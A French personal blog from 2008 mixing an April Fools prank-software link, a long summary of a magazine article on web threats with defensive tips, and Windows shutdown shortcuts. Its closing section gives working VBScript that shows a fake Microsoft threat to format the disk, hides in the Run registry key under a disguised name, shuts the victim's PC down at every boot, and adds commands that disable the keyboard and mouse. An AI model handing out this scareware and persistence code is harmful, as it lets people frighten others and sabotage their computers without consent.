lundi 31 mars 2008
Poisson d'Avril ;o) farces a faire
installer un installateur de farces pour le PC:
42 farces a installer; http://www.atlence.com/index.php?page=download&VoirDown=fa Exemples de blagues : Message d'autodestruction de l'ordinateur, Faux message de Windows® indiquant que vous utilisez une version piratée et que l'équipe Microsoft® a été contactée, Ouverture réelle du lecteur de CD-ROM plusieurs fois de suite, grincement du lecteur de disquettes, rire sarcastique, Plantages de Windows® : écrans bleus, messages d'erreur, Simulation de reformatage, suppression de fichiers, détection de virus, etc.
Piégez vos victimes : Sur votre propre ordinateur, en paramétrant le moment exact à partir duquel la blague doit se déclencher, Sur leurs ordinateurs, en créant un fichier exécutable et en l'envoyant par courriel ou en le copiant sur une disquette ou clé USB.
cool!
dimanche 30 mars 2008
Demain, Qu'elles AttAques vonT nouS Menacées ?
Le web source majeur d'infection:
Fini les parasites reçu par email.En 2007 déja, les pricipaux éditeurs d'antivirus notaient que le web avait détrôné le courrier électronique comme principale source d'infection .
Exemple: En Italie,plus de 10,000 sites furent détournés l'an dernier par un groupe de pirates.En installant sur chaque site une copie du Kit d'infection M Pack (vendu 700$ par correspondance)les pirates laissaient ces sites victimes ,infecter eux-mêmes leurs visiteurs .
Afin d'installer des parasites publicitaires et autres bots destinés a détourner l'ordinateur,toucha des sites gouvernementaux,bancaires ou touristiques qui avaient tous pignon sur rue et auquels tous faisaient confiance.
Plus récemment encore, au début de l'année plusieurs centaines de sites légitimes étaient mystérieusement détournés. Leurs administrateurs se sont révélés incapables de déterminer initialement comment les serveurs avaient été compromis. Et surtout comment ils étaient a nouveau infectés après avoir été nettoyés. Ces serveurs déposaient sur l'ordinateur de leurs visiteurs un code malveillant en Javascript ,doté d'un nom aléatoire et totalement invisible.Et pour cause: les parasites n'existaient qu'en mémoire du serveur et étaient ajoutés a la volée sur les pages envoyées aux visiteurs. Aujourd'hui encore le mystère n'est pas entièrement résolu ,bien que l'ont est successivement soupçonné un module Apache vulnérable puis le vol massif de clé SSH chez l'hébergeur des sites concernés.
La multiplication des sites communautaires façon web 2,0 vient accentuer également cette tendance en favorisant les contenus contaminés publiés par des internautes et capables d'infecter le reste de la communauté,comme l'ont démontré les Vers sur MySpace. Ou bien le Spyware "Secret Crush" sur Facebook.
Les RootKits se banalisent :
Terriblement efficaces pour dissimuler un code parasite sur l'ordinateur,les rootkits étaient l'année dernière encore relativement exétiques.Ils sont en passe de devenir l'équipement standard installé par défaut dès la première infection ,avant d'aller télécharger les codes malveillants eux-mêmes.Avec la montée en puissance des infections via les pages web ,JavaScript était déja très présent comme support d'infection . La multiplication des sites web 2.o et donc d' Ajax , va probablement rendre ce langage incontournable pour les auteurs de virus . (AVG antirootkit et RootKit Revealer de Microsoft sont très bien)
Ajack cache de nombreuses interactions entre la partie visible du navigateur et le serveur ,permettant de jouer de multiples tours ,tels que le vol de cookies,le détournement de sessions etc...
Des Bots encore plus résistants :
Les Bots ces programmes chargés de détourner les PC , afin de les contrôler ,sont encore assez simpliste : leur architecture très centralisée permet de neutraliser un réseau de bots (botnet)aisément . Mais la communauté pirate planche depuis quelques années sur des bots décentralisés, a l' image du peer-to-peer . Le Parasite Peacomm ,apparu en 2007 , exploite,lui , le réseau P2P Overnet pour être plus résistant . Il ne sera probablement pas le dernier.
Faut-il se méfier du web 2.0 ?
(selon, Olivier Caleff,directeur tech. sécurité,Devoteam Consulting)
En faîtes de toute nouvelle technologie émergente ou les développements sont accélérés et les mises en ligne rapides. Qui sait combien de ces solutions passent avec succès de véritables tests de validations fonctionnelles ou de sécurité ? Connaissez-vous assez bien les gestionnaires de ces nouveaux services pour leur confier vos contacts voire certains de vos identifiants de mails ou de messagerie instantanée ?
Peut-on se protéger ?
Ils faut des fondations saines avec un système d'exploitation, un antivirus et un navigateur Web a jour ,antiSpyware,antiRootKit et Pare-feu obligatoire.Aucune solution ne peut prévenir efficacement contre l'inconscience des utilisateurs.
Deux solutions,une gratuite ou l'autre payante ?
Sur les forums ont a toute sorte d'opinions des usagers,................je dirais que la solution payante est pour le newbie(novice) , surtout si vous êtes plusieurs sur le PC et que une suite de sécurité antiviral tout en un n'est pas a éviter,ou bien un contrôle parental fourni par voter FAI; sinon le OneCare $$$ de Microsoft !
La solution gratuite ou OpenSource, est pour l'internaute averti.Mise a part le logiciels citrons,comme AVG,winclam,antivir,Norton security du google-pack,il y en n'a des très bon , comme actuellement Avast! ,Spybot,ZoneAlarm,, qui ne donneront le meilleur d'eux-mêmes que si vous savez les paramétrer et les configurer en profondeur.Ça veut dire ,configurer un scan minutieux,ou heuristic,un scan des fichiers systèmes,un scan incluant le fichier restore de windows,et un scan des fichiers compressé(ZIP,RAR,CAB,...)mais a un niveau 10 minimum de compression de ces formats la.Parce que les antivirus son installés par défaut pour scanner très vite votre PC et sa risque de vous causer des problêmes de désinfection.
Ref.Ordinateur individuel-203
LA FIN DES ANTIVIRUS QUE L'ONT CONNAIT EST PROCHE
Face aux nouvelles techniques d'infection,les logiciels de sécurité ne suffisent plus .Il faut aussi avoir le geste et le comportement qui sauvent.Voila pourquoi,nous devrons pratiquer l'AUTODÉFENSE SUR LE WEB !
La fin des antivirus est proche,;c'est une révélation qui ne signifie malheureusement pas la fin des dangers.Si les antivirus sont appelés a disparaîtres;c'est qu'ils ne sont plus adaptés aux problêmes actuels,pour ne pas dire obsolète.
Il y a 10 ans les pirates difusaient de 200 a 400 nouveaux codes par mois.Aujourd'hui,on est a 1,000 nouveaux codes a l'heure.Sans l'annoncer officiellement ,les éditeurs de solutions de sécurité tirent la langue.Il leur est impossible de suivre une telle cadence de mise a jour et donc indirectement de garantir a l'utilisateur une protection optimale.
Vous avez bien compris:même avec le dernier antivirus mis a jour ,vous n'êtes pas parfaitement protégé!
Pour limiter les dégâts ,les suites de sécurité ont pris le relais.(selon mon opinion; est-ce que les Lobby de fabricants d'antivirus nous influence a acheter des suites Antivirus ??? ,si vous payez pour ça c'est que vous ne savez pas comment configurer un antivirus gratuit , a sa juste capacité ! ).
Ces fourre-tout intègrent a chaque année un peu plus de fonctionnalités.Anti-Hameèonnage ,il y a 2 ans ,Anti-Rootkit l'année dernière ,c'est l'antibot qui fera son apparition dans les prochaines versions.
En ce qui concerne la cybercriminalité ,les pirates ont toujours une longueur d'avance.
Infections Drive By Download,(en surfant simplement sur une page web),Bots de plus en plus intelligents,technique d'hameçonnage dirigée vers les téléphones portables.....les nouveautés ne manquent pas.Des attaques dont les outils de conception sont mis en vente sur le Net. Moyennant quelques centaines de dollards ,n'importe quel pirates peut alors prendre le contrôle de milliers d'ordinateurs ,créer du courrier d'hameçonnage ou exploiter une faille du système.
Faire le maximum d'argent en un minimum de temps est devenu le but principal des cybercriminels. Maintenant,ils ne veulent plus de notoriétés,mais de $$$.(quoi c'est tu des Russes ???) Face a cette économie parallèle qui brasse des millards ,l'internaute est particulièrement exposé.
Aujourd'hui,c'est votre comportement qui peut vous sauver sur internet,plus simplement votre antivirus.
Le top 5 des méchants:
Trojan,Pidef.C
Cheval de troie qui exploite une faille dans Adobe Acrobat ou Adobe Reader .Il peut télécharger et installer des applications sur votre système.
W32.Degnax@mm
Ver qui se diffuse a travers des spams.Il récupère vos adresses électroniques et vos contacts qu'ils réussit a infecter.
WinSpyKiller
Cette fausse application de sécurité génère des rapprots alarmants sur l'état de l'ordinateur.Son but , faire payer une licence pour désinfecter sa machine.
Microsoft Word,faille dans l'exécution de code distant.
Pour s'engouffrer dans cette faille ,un pirate doit faire ouvrir un fichier word infecté a sa victime .Il peut alors exécuter n'importe quel code sur le poste cible.
Spyware.Smart.PCKeylog
Ce spyware(espiongiciel)réalise des captures d'écran et enregistre toutes les activités du PC.
DANGER DU WEB:
1-En navigant sur internet:
Devenir PC Zombie(nouveau) ; Du code malveillant est intégré dans des pages web très fréquentées ,sites de réservation , ou d'événements majeurs .avec le SPLOG ,les pirates peuvent aussi faire re3monter leurs propres sites infectés au premier rang des moteurs de recherche.Il suffit d'un simple affichage de la page pour que l'internaute équipé d'un navigateur non mis a jour soit contaminé par un bot. L'ordinateur devient un PC Zombie.Envoyer du spam ,attaquer des serveurs d'entreprises ou de commerce en ligne ....les possibilités sont multiples.
ëtre espionné:Les spywares scrutent vos faits et gestes en rapportant des informations sur vos habitudes de navigation a des fins commerçiales.Ils sont installés a votre insu avec certains logiciels gratuits.Les Adwares eux se contentent de d'afficher des pop-ups ,de changer de fond d'écran ou d'ajouter des raccourcis sur le bureau vers des sites a promouvoir.
Ëtes-vous contaminé ?
Si votre PC ralenti ,c'est que vous êtes intégré a un réseau de Bots et que vos ressources sont utilisées pour envoyer du spam ou réaliser des attaques de serveurs.Certains adwares modifient la configuration de votre machine,ce sont des Hijacker .Ils peuvent modifier la page d'acceuil de votre navigateur ou ajouter des barres d'outils non désirées.Votre connexion rame;le logiciel espion s'attribue une partie de votre bande passante . Un PC Zombie consacre la majorité de votre débit aux activités pirates que se soit d'une attaque par denie de service (DDOS)ou d'un envoie de spams.Des pop-ups apparaissent ,publicités pour des sites de casino en ligne,proposition d'installation de logiciels de sécurité ,impossible d'échapper a ces publicités,même avec le module de blocage de fenêtre intempestives activé.
Définitions:Splog: Cette manipulation consiste a augmenter la cote Pagerank de Google d'un site ,afin de positionner en haut de la liste des résultats.
Bot : Programmes autonomes qui exécutent des actions a la demande . Ces Bots utilisés par les pirates pour contrôler les PC écoutent et répondent a des ordres qui proviennent généralement de canaux de discussion IRC.
Correction des problêmes par :
Avec Spybot sur http://www.safer-networking.org/ ,un peu meilleur que Ad-Aware, pour éradiquer les spywares.
Avec HiJackThis , pour traquer les Hijackers.et ne pas oublier de désactiver les programmes avec la commande msconfig(sinon pour les Pro ,avec la commande services.msc),pour désactiver les programmes.Mais avant de désactiver un programme avec hijackThis,s'informer avec "info on select object",sinon sur le forum de : http://forum.telecharger01net.com/ordinateurindividuel/rubriqueScanHijackThis
Surfez avec méfiance ,Blogs,sites et réseaux sociaux peuvent cacher des dangers.En un an les attaques qui transitent par l'intermédiaire du langage HTML ont triplé. Avec les applications WEB 2.0 et bientôt web 3.0 , les possibilités d'actions sont grandes et invisibles. La plus grande prudence est donc recommandée.
Activez le pare-feu(Firewall):
Sur win xp ou vista,le firewall n'est pas toujours activé,vérifier dans le panneau de configuration,ouvrez pare-feu windows (win xp)ou allez sur sécurité sous Vista.Pour plus de sécurité ,cochez ne pas autoriser les exceptions .Sinon ZoneAlarm est un bon gratuiciel.
Configurez les protections du navigateur:
Dans les paramètres internet du navigateur(IE),vérifier que les scripts de contrôle ActiveX non signés ne sont pas exécutés.Désactivez aussi le script actif pour empêcher l'exécution de codes.
Aller dans option internet ,dans l'onglet sécurité ,meetez le curseur a niveau: moyen-haut.Sinon ,passez a Firefox,Opéra ,Safari,car ils ne prennent pas en charge l'activeX.
Ce que vous risquez:
Le Spam,en 2007 c'est 85% du traffic mondial d'emails qui en contenait.(1 spam sur 200 est une arnaque)
L'arnaque: (nouveau ! )
L'hameçonnage revient en force avec de nouvelles techniques,pour éviter que les liens vers les faux sites ne soient bloqués par les logiciels d'anti-hameçonnage ,la fausse page est chargée localement sur la machine a l'insu de l'internaute . Les info tapées sont directement envoyées aux pirates . Une solution qui n'a que peu de remèdes.
L'infection :
Les Bots sont les nouvelles grandes menaces cette année.Autonomes,ils changent de forme et sont très difficilement détectables.Récupérer des données,utiliser votre bande passante ,les possibilités sont nombreuses .Ouvrir un simple lien hypertexte contenu dans un couriel peut vous contaminer.
2- Par vos Emails :
90% de vos emails proviennent d'inconnus,pas de doute vous êtes victime des spammeurs.
eBay vous propose de vous connecter a votre compte pour mettre a jour vos données ? Ou bien votre banque vous contacte par email ?
Windows n'est plus très stable,vous n'accédez plus a certaines fonctions,des fenêtres s'ouvrent et se ferment automatiquement ,vous avez sans doute attrapé un virus.
Évitez les dangers :
Utiliser jamais votre email personnelle, mais plutôt des comptes Webmail comme Gmail,Yahoo,Msn,Hotmail,Live mail, pour vos achats commerçiaux.
Masquer votre adresse email dans les forums,pour duper les aspirateurs d'email qui scrutent le web.
Ne faîtes pas confiance aux liens dans les emails,ils peuvent vous amener sur des pages internet piratées .
N'ouvrez pas des emails inconnus ,encore moins des pièces jointes.
Corrigez les problêmes :
Installer un antispam,comme : http://www.spamihilator.com/
Activez le filtre anti-hameçonnage de IE 7 ,aller dans outils de la barre de menu IE7,sur filtre anti-hameçonnage .
3- En installant des programmes :
ce que vous risquez:
Le vol de mots de passe:(nouveau ! )
Si t'es accro aux jeux en ligne ,revendre un accès a World of warcraft ou piller vos armes et vos pouvoirs pour les vendrent au plus offrant voila une pratique de pirate.Deux trojants dérobeurs de mots de passe (onlinegames et magania ) sévissent en ce moment sur le Net.
Le vol d'informations ou de capitaux : (nouveaux ! )
Certains malwares en registrent les frappes de clavier et les envoient aux pirates via internet.
Pour contrer les systèmes de claviers virtuels utilisés par les banques ,les pirates ont développés des applications de captures d'écran .
Les Spywares :
Un grand nombre d'applications(généralement gratuits) intègrent des espiongiciels .
Etes vous contaminé ?
Votre firewall est hyperactif ? des processus aux noms inconnus ,veulent communiquer vers l'extérieur ? Les transactions bancaires se multiplient ,vérifier vos relevés bancaires ! Au moindre doute prévenez votre banque.Des programmes deviennent envahissants ,des fenêtres de programmes de sécurité apparaissent sur votre écran ,ils vous proposent de désinfecter votre système.Ce sont de faux logiciels de sécurité dont le but est de vous infecter de spywares Refusez ce genre d'installation !
Corrigez les problêmes :
Faîtes un scan en ligne: http://www.infecteoupas.fr/ ,pas panda software analyse votre pc et pour un abonnement d'un an,désinfecte votre PC.
Réalisez un audit de votre machine:Vérifier les processus , en ouvrant les gestionnaire de tâches,(ctrl+alt+Suppr)puis clic sur processus ,pour connaître les processus allez sur www.docmemo.com/windows/processus.php
Supprimer des programmes : ,dans panneau de configuration,ajout/suppression de programmes,sous vista aller sur programmes et fonctionnalités.
Nettoyer le disque dur: dans poste de travail,clic droit sur l'icône du disque dur,propriétés,nettoyage de disque.
Régler le pare-feu: Sous vista,taper pare-feu dans le champ rechercher,pour vérifier les applications autorisées,clic sur régler le traffic sortant,désactiver les services suspects.
Évitez les dangers :
Banissez les applications douteuses ,sur les réseaux pirates (Warez)les logiciels gratuits et accessibles a tous ne manquent pas de réaliser des petits méfaits. Ne tombez pas dans l'excès du gratuit ,car ça installe des spywares a votre insus et leurs éditeurs sont grassement payés ,par des sociétés tierces. Mieux vaut opter pour des logiciels connus ,idéalement en opensource.Le code source étant accessible ,il est plus difficile d'y cacher des intrus.
4- En échangeant des fichiers :
Vous risquez des attaques via les ports ouverts,qu'un logiciel P2P(peer-to-peer)soit en fonction ou non,ne vous fait pas courir de plus grands dangers ;certes, des ports sont ouverts ,mais les vers sont en déclin.Les risques sont faibles mais existant.Les fichiers compressés(zip,rar,etc...)peuvent aussi comporter des dangers. Et n'oubliez pas que le partage de contenus protégés est passible de fortes amendes et même de peines d'emprisonnement.
corrigez les problêmes :
Assurez vous qu'aucun logiciel P2P ne soient sur votre machine,en les désinstallant ,il peut rester certaines bribes de votre clients P2P(ont se rappel Kazaa,et non KazaaLight);utilisez Spybot pour scanner votre registre et utilisez ensuite un nettoyeur de registre ,comme Regsupreme(disponible sur http://www.macecraft.com/ ),il détecte les derniers vestiges des clients P2P.
Évitez les dangers :
partagez entre amis,pour plus de sécurité,utilisez les réseaux privés . Les Documents partagés sur windows Live Messenger,sites FTP sont plus sûrs.Gigatribe http://www.gigatribe.com/ est un service qui vous permettra aussi d'échanger vos dossiers avec vos proches en toute simplicité.
Ne téléchargez pas de codecs;une grande tendance est de vous infecter via le lecteur multimédia ;pour réussir les pirates diffusent sur les réseaux P2P des videos qui ne peuvent être lues qu'avec un codec spécifique qu'une page web vous invite a télécharger: un Bot qui n'attendait que vous !
Mettez a jour le système:windows update ou microsoft update ,selon que vous avez ,selon que vous avez Vista ou XP.
5-En tchatant :
ce que vous risquez: contrairement au eMails,les fichiers qui transitent par CHAT (messagerie instantanée)ne pas nécessairement vérifier par des antivirus ,quelques virus ou vers peuvent être encore en circulation !
Corrigez les problêmes : configurez votre antivirus pour le windows Live Messenger;allez dans outils,options,transfert de fichier,cocher détecter les virus dans les fichiers a l'aide de,Parcourez le chemin de votre programme antivirus.exe.
Bloquer tous les transferts;cocher la case,rejeter automatiquement le transfert de fichier pour les types de fichiers dangereux .(mais vous perdez en flexibilité sur le transfert de document).
Evitez les dangers :n'acceptez pas n'importe quoi les extentions les plus risquées sont les EXE , VBS .
Ne cliquez pas sur les liens :Sous une apparence anodine,certains dissimulent un fichier exécutable qui s'activera au moindre clic.
6-En utilisant votre Mobile(Cellulaire) :
Vous risquez,Le Smishing:(Nouveau ! )
L'hameçonnage se déporte sur le Mobile et transite par le SMS . En pratique,vous recevez un SMS confirmant votre inscription a un service payant a un tarif exorbitant.Tout repose ensuite dans la promesse d'annulation Vous pouvez être invité a cliquer sur un lien;la page web qui s'ouvre contamine votre Mobile.Il peut aussi être demandé d'envoyer un SMS d'annulation a un numéro surtaxé a plusieurs Dollard l'appel.
Le Vishing : (nouveau ! )
Cette arnaque est encore plus élaborée;elle repose sur la mise en place de serveurs vocaux ,ce qui demande une organisation et un investissement importants.Ces serveurs composent au hasard des numéros de téléphones portables . Si vous décrochez le serveur vocal se présente comme celui de votre banque et vous invite sous prétexte d'une vérification , a 16 chiffres de votre carte bancaire . Ces informations sont utilisées a votre insus ou revendues au plus offrant.
Corrigez les problêmes : installez un antivirus pour mobile http://www.trendmicro.fr/ , pour 35$/année , ou version 30 jours;Avec seulement quelques dizaines de virus actuellement,ont est encore loin des millions de signatures pour PC.
Configurer l'Antispam:
Pour éviter le smishing,créez une liste de correspondants autorisés a envoyer des SMS. Prenez toute votre liste de contacts et insérez-la dans la liste approuvée.N'oubliez pas ensuite de l'actualiser avec vos nouveaux contacts.
Évitez les dangers :
Désactivez le Bluetooth:le risque est la ,car des pirates ont démontrés des failles,car mieux vaut éviter toutes les connections extérieures.
Ne rappelez pas un numéro inconnu;Pour éviter a coup sûr le risque de vishing ou toute arnaque basée sur les numéros surtaxés et surtout ne saisissez aucune coordonnée bancaire ,même si ont vous le demande . Aucune banque ne procède via les serveurs vocaux pour valider des informations.
Évitez les sites de sonneries douteux :Les sonneries de portable sont populaires,mais pour récupérer une sonnerie ,il faut communiquer votre numéro de téléphone. Une base de données d'utilisateurs accros au mobile qui peut être utilisée a des fins très malveillantes.
Fin ;0)
Ref;OrdinateurIndividuel, magazine numéro 203.
Arrêter l'ordinateur rapidement,avec un raccourci
Windows 95, 98, Me :
Cliquez avec le bouton droit de la souris sur un emplacement vide du bureau. Dans le menu contextuel, cliquez sur Nouveau puis Raccourci. Dans le champ Ligne de comande, saisissez Rundll32.exe user,exitwindows puis cliquez sur Suivant. Dans le champ Nom, saisissez le nom du raccourci puis cliquez sur Terminer.
Pour arrêter rapidement l'ordinateur grâce à un raccourci avec Windows XP :
Cliquez avec le bouton droit de la souris sur un emplacement vide du bureau. Dans le menu contextuel, cliquez sur Nouveau puis Raccourci. Dans le champ Cible, saisissez Shutdown -s -t 01 (01 est le délai en secondes avant fermeture) puis cliquez sur Suivant. Dans le champ Nom, saisissez le nom du raccourci puis cliquez sur Terminer. Pour Windows XP, il existe aussi les paramètres -i (déconnecte l'utilisateur actuel), -f (ferme tous les programmes) et -c "message" (affiche un message de 127 caractères au maximum).
Pour win98 j'ai trouvé un truc infaillible et très killer,ça peut s'appliquer a fermer un pc ou même un clavier ou souris pour imiter un logiciel de controle parental. Il existe un truc dans Windows qui s`appelle WSH (Windows Scripting Host). Le WSH supporte les VBScript, les JScript, Perl et Python. Pour le WSH il n`y a pas besoin d`avoir des compilateurs... il faut juste avoir dans quoi ecrire un texte. On va prendre le Blocnote. Ovrez le Blocnote et inscrivez: Test = MsgBox("Votre systeme a ete declare comme illegal par les services de Microsoft. Votre disque dur va etre formate pour cette raison. Si vous voulez formater votre disque dur tout de suite appuyez sur Oui. Si vous voulez d`abord sauvgarder tous les fichiers et formater le disque dur apres redemarage de votre ordinateur appuyez sur Non", 20, "Erreur du Systeme") Sauvegardez tout ca sous le nom de message.vsb (extension .vsb et pas .txt) et lancez ce fichier. Vous pouvez effectuer cette operation sur n`importe quel ordi et donc quand c`est le bon moment ecrivez qq chose de ce genrde et sauvgardez le. Si un de vos amis/ennemis voit ca sur son ecran devinez ce qu`il va faire...Mais comment va-t-il lancer le fichier? Pour ca allez dans le registre et dans HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run creez une valeur texte (String Value) et ecrivez qq chose comme internatdll32 et dans le 2eme parametre inscrivez l`endroit ou ce trouve le script (ex: C:\Program Files\message.vbs). Voila maintenant aprez avoir redemare le PC le message s`affichera. Mais ca fera un peu suspect et la victime risque de ne pas y croire... Alors on va faire en sorte que ca ne se lance que apres une certaine date.
Pour cela inscrivez avant le message:
If Day(now)>15Then
(ici il y a le message)
End If
Maintenant le message ne s`affichera plus que apres le 15 de chaque mois. Mais j`ai un sentiment que ca vous suffit pas... Vous avez raison. Grace au code suivant l`ordi de la victime va s`etaindre a chaque fois qu`il lancera Windaube:
Sub sheff (Hack, Wait)
Set WshShell=WScript.CreateObject("WScript.Shell")
X=WshShell.Run(Hack, Wait)
End Sub
Call sheff("rundll32 shell32,SHExitWindowsEx - 1", True)
Et tout ca on le met dans le registre aussi pour que ca marche a chaque demarage (sauf en mode sans echec). Comme vous avez peut-etre remarque que apres la fonction Call entre parantheses il y a une commande que vous pouvez entrer dans "Executer" (Boutton Demarer\Executer). Donc si vous mettez Call sheff("C:\Windows\Calc.exe", True) ca va lancer la calculette.... A vous d`en disposer. Voici d`autres commandes interessantes:
rundll32 keyboard, disable : eteint le cavier
rundll32 mouse, disable : eteint la souris
rundll32 user, swapmousebutton : change souris pour droitiers/gauchers
rundll32 krnl386.exe , exit kernel : sort de windaube sans rien dire